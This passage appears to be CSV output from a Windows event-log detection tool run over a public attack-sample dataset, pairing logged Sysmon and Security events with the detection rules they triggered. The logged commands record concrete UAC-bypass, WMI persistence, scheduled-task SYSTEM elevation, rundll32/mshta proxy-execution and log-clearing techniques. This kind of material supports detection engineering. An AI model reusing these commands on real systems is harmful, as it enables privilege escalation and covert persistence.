C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-12 01:46:20.828 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-12 01:54:02.071 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-12 01:54:07.508 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-12 01:54:12.493 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent 
Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-12 01:54:12.821 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-12 02:10:06.342 +09:00,IEWIN7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx +2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,informational,Logon Type 9 - NewCredentials,User: IEUser : Workstation: : IP Address: ::1 : Port: 0 : LogonID: 0x1bbdce : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx +2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx +2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx +2019-05-12 02:28:17.176 +09:00,IEWIN7,1,informational,Process Creation,"Command: 
python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:19.567 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmstp.exe"" /au c:\users\ieuser\appdata\local\temp\tmp.ini : Path: C:\Windows\System32\cmstp.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:19.567 +09:00,IEWIN7,1,high,Bypass UAC via CMSTP,,rules/sigma/process_creation/win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:22.598 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7},rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:22.598 +09:00,IEWIN7,13,high,CMSTP Execution Registry Event,,rules/sigma/registry_event/sysmon_cmstp_execution_by_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:22.598 +09:00,IEWIN7,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:57:49.903 +09:00,IEWIN7,1,informational,Process 
Creation,"Command: python winpwnage.py -u elevate -5 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:22.809 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:23.215 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer CREATE Name=""BotConsumer23"", ExecutablePath=""c:\Windows\System32\cmd.exe"", CommandLineTemplate=""c:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:23.450 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding CREATE Filter='__EventFilter.Name=""BotFilter82""', Consumer='CommandLineEventConsumer.Name=""BotConsumer23""' : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:23.590 
+09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter CREATE Name=""BotFilter82"", EventNameSpace=""root\cimv2"", QueryLanguage=""WQL"", Query=""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:50.090 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:54.887 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer WHERE Name=""BotConsumer23"" DELETE : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p 
c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:55.028 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter WHERE Name=""BotFilter82"" DELETE : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:55.153 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=""BotFilter82""' DELETE : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 03:10:42.434 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u elevate -i 1 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx +2019-05-12 03:10:42.668 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\lsass.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx +2019-05-12 03:10:42.668 +09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx +2019-05-12 09:32:24.461 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:30.211 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:30.211 +09:00,IEWIN7,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:30.211 +09:00,IEWIN7,1,high,Suspicius Add Task From User AppData Temp,,rules/sigma/process_creation/win_pc_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:35.258 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /run /tn elevator : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent 
Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:35.352 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: taskeng.exe {9C7BC894-6658-423B-9B58-61636DBB1451} S-1-5-18:NT AUTHORITY\System:Service:,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:40.342 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /delete /tn elevator : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 22:30:32.931 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:30:46.400 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u execute -i 9 -p 
c:\Windows\system32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:30:46.400 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:30:46.556 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:32:58.167 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:32:58.167 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:33:37.078 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,FileProtocolHandler calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:33:37.078 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:33:59.743 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:33:59.743 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.523 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.523 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.712 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" : Path: 
C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:01.383 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:55:56.626 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 22:56:12.652 
+09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 22:56:12.652 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 22:58:39.850 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx +2019-05-12 22:58:54.897 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx +2019-05-12 22:58:54.897 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx +2019-05-12 23:18:03.589 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: 
C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx +2019-05-12 23:18:09.589 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx +2019-05-12 23:18:09.589 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx +2019-05-13 02:01:43.391 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx +2019-05-13 02:01:50.781 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\pcalua.exe"" -a c:\Windows\system32\calc.exe : Path: C:\Windows\System32\pcalua.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx +2019-05-13 02:01:51.007 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\pcalua.exe"" -a 
